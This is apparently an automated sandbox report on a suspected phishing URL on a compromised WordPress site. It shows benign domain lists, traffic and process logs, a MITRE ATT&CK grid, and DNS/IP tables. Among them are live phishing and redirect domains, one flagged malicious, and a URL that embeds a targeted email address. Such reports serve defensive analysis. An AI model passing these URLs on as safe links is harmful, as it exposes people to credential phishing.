      Source: sets.json.1.drString found in binary or memory: https://nien.com
      Source: sets.json.1.drString found in binary or memory: https://nien.org
      Source: sets.json.1.drString found in binary or memory: https://nlc.hu
      Source: sets.json.1.drString found in binary or memory: https://nosalty.hu
      Source: sets.json.1.drString found in binary or memory: https://noticiascaracol.com
      Source: sets.json.1.drString found in binary or memory: https://nourishingpursuits.com
      Source: sets.json.1.drString found in binary or memory: https://nvidia.com
      Source: sets.json.1.drString found in binary or memory: https://o2.pl
      Source: sets.json.1.drString found in binary or memory: https://ocdn.eu
      Source: sets.json.1.drString found in binary or memory: https://onet.pl
      Source: sets.json.1.drString found in binary or memory: https://ottplay.com
      Source: sets.json.1.drString found in binary or memory: https://p106.net
      Source: sets.json.1.drString found in binary or memory: https://p24.hu
      Source: sets.json.1.drString found in binary or memory: https://paula.com.uy
      Source: sets.json.1.drString found in binary or memory: https://pdmp-apis.no
      Source: sets.json.1.drString found in binary or memory: https://phonandroid.com
      Source: sets.json.1.drString found in binary or memory: https://player.pl
      Source: sets.json.1.drString found in binary or memory: https://plejada.pl
      Source: sets.json.1.drString found in binary or memory: https://poalim.site
      Source: sets.json.1.drString found in binary or memory: https://poalim.xyz
      Source: sets.json.1.drString found in binary or memory: https://pomponik.pl
      Source: sets.json.1.drString found in binary or memory: https://portalinmobiliario.com
      Source: sets.json.1.drString found in binary or memory: https://prisjakt.no
      Source: sets.json.1.drString found in binary or memory: https://pudelek.pl
      Source: sets.json.1.drString found in binary or memory: https://punjabijagran.com
      Source: sets.json.1.drString found in binary or memory: https://radio1.be
      Source: sets.json.1.drString found in binary or memory: https://radio2.be
      Source: sets.json.1.drString found in binary or memory: https://reactor.cc
      Source: sets.json.1.drString found in binary or memory: https://repid.org
      Source: sets.json.1.drString found in binary or memory: https://reshim.org
      Source: sets.json.1.drString found in binary or memory: https://rws1nvtvt.com
      Source: sets.json.1.drString found in binary or memory: https://rws2nvtvt.com
      Source: sets.json.1.drString found in binary or memory: https://rws3nvtvt.com
      Source: sets.json.1.drString found in binary or memory: https://sackrace.ai
      Source: sets.json.1.drString found in binary or memory: https://salemoveadvisor.com
      Source: sets.json.1.drString found in binary or memory: https://salemovefinancial.com
      Source: sets.json.1.drString found in binary or memory: https://salemovetravel.com
      Source: sets.json.1.drString found in binary or memory: https://samayam.com
      Source: sets.json.1.drString found in binary or memory: https://sapo.io
      Source: sets.json.1.drString found in binary or memory: https://sapo.pt
      Source: sets.json.1.drString found in binary or memory: https://shock.co
      Source: sets.json.1.drString found in binary or memory: https://smaker.pl
      Source: sets.json.1.drString found in binary or memory: https://smoney.vn
      Source: sets.json.1.drString found in binary or memory: https://smpn106jkt.sch.id
      Source: sets.json.1.drString found in binary or memory: https://socket-to-me.vip
      Source: sets.json.1.drString found in binary or memory: https://songshare.com
      Source: sets.json.1.drString found in binary or memory: https://songstats.com
      Source: sets.json.1.drString found in binary or memory: https://sporza.be
      Source: sets.json.1.drString found in binary or memory: https://standardsandpraiserepurpose.com
      Source: sets.json.1.drString found in binary or memory: https://startlap.hu
      Source: sets.json.1.drString found in binary or memory: https://startupislandtaiwan.com
      Source: sets.json.1.drString found in binary or memory: https://startupislandtaiwan.net
      Source: sets.json.1.drString found in binary or memory: https://startupislandtaiwan.org
      Source: sets.json.1.drString found in binary or memory: https://stripe.com
      Source: sets.json.1.drString found in binary or memory: https://stripe.network
      Source: sets.json.1.drString found in binary or memory: https://stripecdn.com
      Source: sets.json.1.drString found in binary or memory: https://supereva.it
      Source: sets.json.1.drString found in binary or memory: https://takeabreak.co.uk
      Source: sets.json.1.drString found in binary or memory: https://talkdeskqaid.com
      Source: sets.json.1.drString found in binary or memory: https://talkdeskstgid.com
      Source: sets.json.1.drString found in binary or memory: https://teacherdashboard.com
      Source: sets.json.1.drString found in binary or memory: https://technology-revealed.com
      Source: sets.json.1.drString found in binary or memory: https://terazgotuje.pl
      Source: sets.json.1.drString found in binary or memory: https://text.com
      Source: sets.json.1.drString found in binary or memory: https://textyserver.appspot.com
      Source: sets.json.1.drString found in binary or memory: https://the42.ie
      Source: sets.json.1.drString found in binary or memory: https://thejournal.ie
      Source: sets.json.1.drString found in binary or memory: https://thirdspace.org.au
      Source: sets.json.1.drString found in binary or memory: https://timesinternet.in
      Source: sets.json.1.drString found in binary or memory: https://timesofindia.com
      Source: sets.json.1.drString found in binary or memory: https://tolteck.app
      Source: sets.json.1.drString found in binary or memory: https://tolteck.com
      Source: sets.json.1.drString found in binary or memory: https://top.pl
      Source: sets.json.1.drString found in binary or memory: https://tribunnews.com
      Source: sets.json.1.drString found in binary or memory: https://trytalkdesk.com
      Source: sets.json.1.drString found in binary or memory: https://tucarro.com
      Source: sets.json.1.drString found in binary or memory: https://tucarro.com.co
      Source: sets.json.1.drString found in binary or memory: https://tucarro.com.ve
      Source: sets.json.1.drString found in binary or memory: https://tvid.in
      Source: sets.json.1.drString found in binary or memory: https://tvn.pl
      Source: sets.json.1.drString found in binary or memory: https://tvn24.pl
      Source: sets.json.1.drString found in binary or memory: https://unotv.com
      Source: sets.json.1.drString found in binary or memory: https://victorymedium.com
      Source: sets.json.1.drString found in binary or memory: https://vrt.be
      Source: sets.json.1.drString found in binary or memory: https://vwo.com
      Source: sets.json.1.drString found in binary or memory: https://welt.de
      Source: sets.json.1.drString found in binary or memory: https://wieistmeineip.de
      Source: sets.json.1.drString found in binary or memory: https://wildix.com
      Source: sets.json.1.drString found in binary or memory: https://wildixin.com
      Source: sets.json.1.drString found in binary or memory: https://wingify.com
      Source: sets.json.1.drString found in binary or memory: https://wordle.at
      Source: sets.json.1.drString found in binary or memory: https://wp.pl
      Source: sets.json.1.drString found in binary or memory: https://wpext.pl
      Source: sets.json.1.drString found in binary or memory: https://www.asadcdn.com
      Source: sets.json.1.drString found in binary or memory: https://ya.ru
      Source: sets.json.1.drString found in binary or memory: https://yours.co.uk
      Source: sets.json.1.drString found in binary or memory: https://zalo.me
      Source: sets.json.1.drString found in binary or memory: https://zdrowietvn.pl
      Source: sets.json.1.drString found in binary or memory: https://zingmp3.vn
      Source: sets.json.1.drString found in binary or memory: https://zoom.com
      Source: sets.json.1.drString found in binary or memory: https://zoom.us
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
      Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
      Source: unknownNetwork traffic detected: HTTP traffic on port 49672 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
      Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 58150 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
      Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
      Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
      Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
      Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58149
      Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58150
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
      Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49674 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
      Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
      Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
      Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
      Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
      Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
      Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 58149 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
      Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
      Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
      Source: unknownHTTPS traffic detected: 40.113.110.67:443 -> 192.168.2.6:49715 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 40.113.110.67:443 -> 192.168.2.6:49716 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 40.113.110.67:443 -> 192.168.2.6:49736 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 40.113.110.67:443 -> 192.168.2.6:49741 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 40.113.110.67:443 -> 192.168.2.6:49757 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 40.113.110.67:443 -> 192.168.2.6:58150 version: TLS 1.2
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping3180_261838860Jump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping3180_261838860\sets.jsonJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping3180_261838860\manifest.jsonJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping3180_261838860\LICENSEJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping3180_261838860\_metadata\Jump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping3180_261838860\_metadata\verified_contents.jsonJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping3180_261838860\manifest.fingerprintJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile deleted: C:\Windows\SystemTemp\chrome_BITS_3180_1795532483Jump to behavior
      Source: classification engineClassification label: mal52.phis.win@18/30@26/15
      Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2668 --field-trial-handle=2004,i,11872680787361419669,16306306468207195550,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
      Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://handymanproservices.com/wp-includes/"
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2668 --field-trial-handle=2004,i,11872680787361419669,16306306468207195550,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: Window RecorderWindow detected: More than 3 window changes detected
      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
      Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
      Browser Extensions
      1
      Process Injection
      1
      Masquerading
      OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System1
      Encrypted Channel
      Exfiltration Over Other Network MediumAbuse Accessibility Features
      CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
      Process Injection
      LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media3
      Non-Application Layer Protocol
      Exfiltration Over BluetoothNetwork Denial of Service
      Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
      File Deletion
      Security Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive4
      Application Layer Protocol
      Automated ExfiltrationData Encrypted for Impact
      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture3
      Ingress Tool Transfer
      Traffic DuplicationData Destruction
      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand
      SourceDetectionScannerLabelLink
      https://handymanproservices.com/wp-includes/0%Avira URL Cloudsafe
      No Antivirus matches
      No Antivirus matches
      No Antivirus matches
      SourceDetectionScannerLabelLink
      https://8l.dichotomou8.com/bQpOadeMo/0%Avira URL Cloudsafe
      https://handymanproservices.com/favicon.ico0%Avira URL Cloudsafe
      NameIPActiveMaliciousAntivirus DetectionReputation
      ajcs6.revishbos.ru
      104.21.2.8
      truefalse
        unknown
        code.jquery.com
        151.101.130.137
        truefalse
          high
          developers.cloudflare.com
          104.16.5.189
          truefalse
            high
            cdnjs.cloudflare.com
            104.17.25.14
            truefalse
              high
              challenges.cloudflare.com
              104.18.95.41
              truefalse
                high
                s-part-0017.t-0009.fb-t-msedge.net
                13.107.253.45
                truefalse
                  high
                  www.google.com
                  142.250.186.164
                  truefalse
                    high
                    handymanproservices.com
                    66.29.153.222
                    truefalse
                      unknown
                      8l.dichotomou8.com
                      188.114.96.3
                      truetrue
                        unknown
                        NameMaliciousAntivirus DetectionReputation
                        https://challenges.cloudflare.com/turnstile/v0/g/8a57887573f2/api.jsfalse
                          high
                          https://handymanproservices.com/favicon.icofalse
                          • Avira URL Cloud: safe
                          unknown
                          https://8l.dichotomou8.com/bQpOadeMo/#Xws924g@jaip.orgfalse
                            unknown
                            https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.1.1/crypto-js.min.jsfalse
                              high
                              https://8l.dichotomou8.com/bQpOadeMo/true
                              • Avira URL Cloud: safe
                              unknown
                              NameSourceMaliciousAntivirus DetectionReputation
                              https://wieistmeineip.desets.json.1.drfalse
                                high
                                https://mercadoshops.com.cosets.json.1.drfalse
                                  high
                                  https://gliadomain.comsets.json.1.drfalse
                                    high
                                    https://poalim.xyzsets.json.1.drfalse
                                      high
                                      https://mercadolivre.comsets.json.1.drfalse
                                        high
                                        https://reshim.orgsets.json.1.drfalse
                                          high
                                          https://nourishingpursuits.comsets.json.1.drfalse
                                            high
                                            https://medonet.plsets.json.1.drfalse
                                              high
                                              https://unotv.comsets.json.1.drfalse
                                                high
                                                https://mercadoshops.com.brsets.json.1.drfalse
                                                  high
                                                  https://joyreactor.ccsets.json.1.drfalse
                                                    high
                                                    https://zdrowietvn.plsets.json.1.drfalse
                                                      high
                                                      https://johndeere.comsets.json.1.drfalse
                                                        high
                                                        https://songstats.comsets.json.1.drfalse
                                                          high
                                                          https://baomoi.comsets.json.1.drfalse
                                                            high
                                                            https://supereva.itsets.json.1.drfalse
                                                              high
                                                              https://elfinancierocr.comsets.json.1.drfalse
                                                                high
                                                                https://bolasport.comsets.json.1.drfalse
                                                                  high
                                                                  https://rws1nvtvt.comsets.json.1.drfalse
                                                                    high
                                                                    https://desimartini.comsets.json.1.drfalse
                                                                      high
                                                                      https://hearty.appsets.json.1.drfalse
                                                                        high
                                                                        https://hearty.giftsets.json.1.drfalse
                                                                          high
                                                                          https://mercadoshops.comsets.json.1.drfalse
                                                                            high
                                                                            https://heartymail.comsets.json.1.drfalse
                                                                              high
                                                                              https://nlc.husets.json.1.drfalse
                                                                                high
                                                                                https://p106.netsets.json.1.drfalse
                                                                                  high
                                                                                  https://radio2.besets.json.1.drfalse
                                                                                    high
                                                                                    https://finn.nosets.json.1.drfalse
                                                                                      high
                                                                                      https://hc1.comsets.json.1.drfalse
                                                                                        high
                                                                                        https://kompas.tvsets.json.1.drfalse
                                                                                          high
                                                                                          https://mystudentdashboard.comsets.json.1.drfalse
                                                                                            high
                                                                                            https://songshare.comsets.json.1.drfalse
                                                                                              high
                                                                                              https://smaker.plsets.json.1.drfalse
                                                                                                high
                                                                                                https://mercadopago.com.mxsets.json.1.drfalse
                                                                                                  high
                                                                                                  https://p24.husets.json.1.drfalse
                                                                                                    high
                                                                                                    https://talkdeskqaid.comsets.json.1.drfalse
                                                                                                      high
                                                                                                      https://24.husets.json.1.drfalse
                                                                                                        high
                                                                                                        https://mercadopago.com.pesets.json.1.drfalse
                                                                                                          high
                                                                                                          https://cardsayings.netsets.json.1.drfalse
                                                                                                            high
                                                                                                            https://text.comsets.json.1.drfalse
                                                                                                              high
                                                                                                              https://mightytext.netsets.json.1.drfalse
                                                                                                                high
                                                                                                                https://pudelek.plsets.json.1.drfalse
                                                                                                                  high
                                                                                                                  https://hazipatika.comsets.json.1.drfalse
                                                                                                                    high
                                                                                                                    https://joyreactor.comsets.json.1.drfalse
                                                                                                                      high
                                                                                                                      https://cookreactor.comsets.json.1.drfalse
                                                                                                                        high
                                                                                                                        https://wildixin.comsets.json.1.drfalse
                                                                                                                          high
                                                                                                                          https://eworkbookcloud.comsets.json.1.drfalse
                                                                                                                            high
                                                                                                                            https://cognitiveai.rusets.json.1.drfalse
                                                                                                                              high
                                                                                                                              https://nacion.comsets.json.1.drfalse
                                                                                                                                high
                                                                                                                                https://chennien.comsets.json.1.drfalse
                                                                                                                                  high
                                                                                                                                  https://drimer.travelsets.json.1.drfalse
                                                                                                                                    high
                                                                                                                                    https://deccoria.plsets.json.1.drfalse
                                                                                                                                      high
                                                                                                                                      https://mercadopago.clsets.json.1.drfalse
                                                                                                                                        high
                                                                                                                                        https://talkdeskstgid.comsets.json.1.drfalse
                                                                                                                                          high
                                                                                                                                          https://naukri.comsets.json.1.drfalse
                                                                                                                                            high
                                                                                                                                            https://interia.plsets.json.1.drfalse
                                                                                                                                              high
                                                                                                                                              https://bonvivir.comsets.json.1.drfalse
                                                                                                                                                high
                                                                                                                                                https://carcostadvisor.besets.json.1.drfalse
                                                                                                                                                  high
                                                                                                                                                  https://salemovetravel.comsets.json.1.drfalse
                                                                                                                                                    high
                                                                                                                                                    https://sapo.iosets.json.1.drfalse
                                                                                                                                                      high
                                                                                                                                                      https://wpext.plsets.json.1.drfalse
                                                                                                                                                        high
                                                                                                                                                        https://welt.desets.json.1.drfalse
                                                                                                                                                          high
                                                                                                                                                          https://poalim.sitesets.json.1.drfalse
                                                                                                                                                            high
                                                                                                                                                            https://drimer.iosets.json.1.drfalse
                                                                                                                                                              high
                                                                                                                                                              https://infoedgeindia.comsets.json.1.drfalse
                                                                                                                                                                high
                                                                                                                                                                https://blackrockadvisorelite.itsets.json.1.drfalse
                                                                                                                                                                  high
                                                                                                                                                                  https://cognitive-ai.rusets.json.1.drfalse
                                                                                                                                                                    high
                                                                                                                                                                    https://cafemedia.comsets.json.1.drfalse
                                                                                                                                                                      high
                                                                                                                                                                      https://graziadaily.co.uksets.json.1.drfalse
                                                                                                                                                                        high
                                                                                                                                                                        https://thirdspace.org.ausets.json.1.drfalse
                                                                                                                                                                          high
                                                                                                                                                                          https://mercadoshops.com.arsets.json.1.drfalse
                                                                                                                                                                            high
                                                                                                                                                                            https://smpn106jkt.sch.idsets.json.1.drfalse
                                                                                                                                                                              high
                                                                                                                                                                              https://elpais.uysets.json.1.drfalse
                                                                                                                                                                                high
                                                                                                                                                                                https://landyrev.comsets.json.1.drfalse
                                                                                                                                                                                  high
                                                                                                                                                                                  https://the42.iesets.json.1.drfalse
                                                                                                                                                                                    high
                                                                                                                                                                                    https://commentcamarche.comsets.json.1.drfalse
                                                                                                                                                                                      high
                                                                                                                                                                                      https://tucarro.com.vesets.json.1.drfalse
                                                                                                                                                                                        high
                                                                                                                                                                                        https://rws3nvtvt.comsets.json.1.drfalse
                                                                                                                                                                                          high
                                                                                                                                                                                          https://eleconomista.netsets.json.1.drfalse
                                                                                                                                                                                            high
                                                                                                                                                                                            https://helpdesk.comsets.json.1.drfalse
                                                                                                                                                                                              high
                                                                                                                                                                                              https://mercadolivre.com.brsets.json.1.drfalse
                                                                                                                                                                                                high
                                                                                                                                                                                                https://clmbtech.comsets.json.1.drfalse
                                                                                                                                                                                                  high
                                                                                                                                                                                                  https://standardsandpraiserepurpose.comsets.json.1.drfalse
                                                                                                                                                                                                    high
                                                                                                                                                                                                    https://07c225f3.onlinesets.json.1.drfalse
                                                                                                                                                                                                      high
                                                                                                                                                                                                      https://salemovefinancial.comsets.json.1.drfalse
                                                                                                                                                                                                        high
                                                                                                                                                                                                        https://mercadopago.com.brsets.json.1.drfalse
                                                                                                                                                                                                          high
                                                                                                                                                                                                          https://zoom.ussets.json.1.drfalse
                                                                                                                                                                                                            high
                                                                                                                                                                                                            https://commentcamarche.netsets.json.1.drfalse
                                                                                                                                                                                                              high
                                                                                                                                                                                                              https://etfacademy.itsets.json.1.drfalse
                                                                                                                                                                                                                high
                                                                                                                                                                                                                https://mighty-app.appspot.comsets.json.1.drfalse
                                                                                                                                                                                                                  high
                                                                                                                                                                                                                  https://hj.rssets.json.1.drfalse
                                                                                                                                                                                                                    high
                                                                                                                                                                                                                    https://hearty.mesets.json.1.drfalse
                                                                                                                                                                                                                      high
                                                                                                                                                                                                                      https://mercadolibre.com.gtsets.json.1.drfalse
                                                                                                                                                                                                                        high
                                                                                                                                                                                                                        https://timesinternet.insets.json.1.drfalse
                                                                                                                                                                                                                          high
                                                                                                                                                                                                                          https://indiatodayne.insets.json.1.drfalse
                                                                                                                                                                                                                            high
                                                                                                                                                                                                                            • No. of IPs < 25%
                                                                                                                                                                                                                            • 25% < No. of IPs < 50%
                                                                                                                                                                                                                            • 50% < No. of IPs < 75%
                                                                                                                                                                                                                            • 75% < No. of IPs
                                                                                                                                                                                                                            IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                                            104.17.24.14
                                                                                                                                                                                                                            unknownUnited States
                                                                                                                                                                                                                            13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                            104.18.95.41
                                                                                                                                                                                                                            challenges.cloudflare.comUnited States
                                                                                                                                                                                                                            13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                            104.16.5.189
                                                                                                                                                                                                                            developers.cloudflare.comUnited States
                                                                                                                                                                                                                            13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                            151.101.130.137
                                                                                                                                                                                                                            code.jquery.comUnited States
                                                                                                                                                                                                                            54113FASTLYUSfalse
                                                                                                                                                                                                                            172.67.186.200
                                                                                                                                                                                                                            unknownUnited States
                                                                                                                                                                                                                            13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                            239.255.255.250
                                                                                                                                                                                                                            unknownReserved
                                                                                                                                                                                                                            unknownunknownfalse
                                                                                                                                                                                                                            188.114.96.3
                                                                                                                                                                                                                            8l.dichotomou8.comEuropean Union
                                                                                                                                                                                                                            13335CLOUDFLARENETUStrue
                                                                                                                                                                                                                            142.250.186.164
                                                                                                                                                                                                                            www.google.comUnited States
                                                                                                                                                                                                                            15169GOOGLEUSfalse
                                                                                                                                                                                                                            151.101.194.137
                                                                                                                                                                                                                            unknownUnited States
                                                                                                                                                                                                                            54113FASTLYUSfalse
                                                                                                                                                                                                                            104.17.25.14
                                                                                                                                                                                                                            cdnjs.cloudflare.comUnited States
                                                                                                                                                                                                                            13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                            104.16.2.189
                                                                                                                                                                                                                            unknownUnited States
                                                                                                                                                                                                                            13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                            66.29.153.222
                                                                                                                                                                                                                            handymanproservices.comUnited States
                                                                                                                                                                                                                            19538ADVANTAGECOMUSfalse
                                                                                                                                                                                                                            104.21.2.8
                                                                                                                                                                                                                            ajcs6.revishbos.ruUnited States
                                                                                                                                                                                                                            13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                            IP
                                                                                                                                                                                                                            192.168.2.16
                                                                                                                                                                                                                            192.168.2.6
                                                                                                                                                                                                                            Joe Sandbox version:42.0.0 Malachite
                                                                                                                                                                                                                            Analysis ID:1612221
                                                                                                                                                                                                                            Start date and time:2025-02-11 16:25:10 +01:00
                                                                                                                                                                                                                            Joe Sandbox product:CloudBasic
                                                                                                                                                                                                                            Overall analysis duration:0h 3m 53s
                                                                                                                                                                                                                            Hypervisor based Inspection enabled:false
                                                                                                                                                                                                                            Report type:full
                                                                                                                                                                                                                            Cookbook file name:browseurl.jbs
                                                                                                                                                                                                                            Sample URL:https://handymanproservices.com/wp-includes/
                                                                                                                                                                                                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                                                            Number of analysed new started processes analysed:6
                                                                                                                                                                                                                            Number of new started drivers analysed:0
                                                                                                                                                                                                                            Number of existing processes analysed:0
                                                                                                                                                                                                                            Number of existing drivers analysed:0
                                                                                                                                                                                                                            Number of injected processes analysed:0
                                                                                                                                                                                                                            Technologies:
                                                                                                                                                                                                                            • HCA enabled
                                                                                                                                                                                                                            • EGA enabled
                                                                                                                                                                                                                            • AMSI enabled
                                                                                                                                                                                                                            Analysis Mode:default
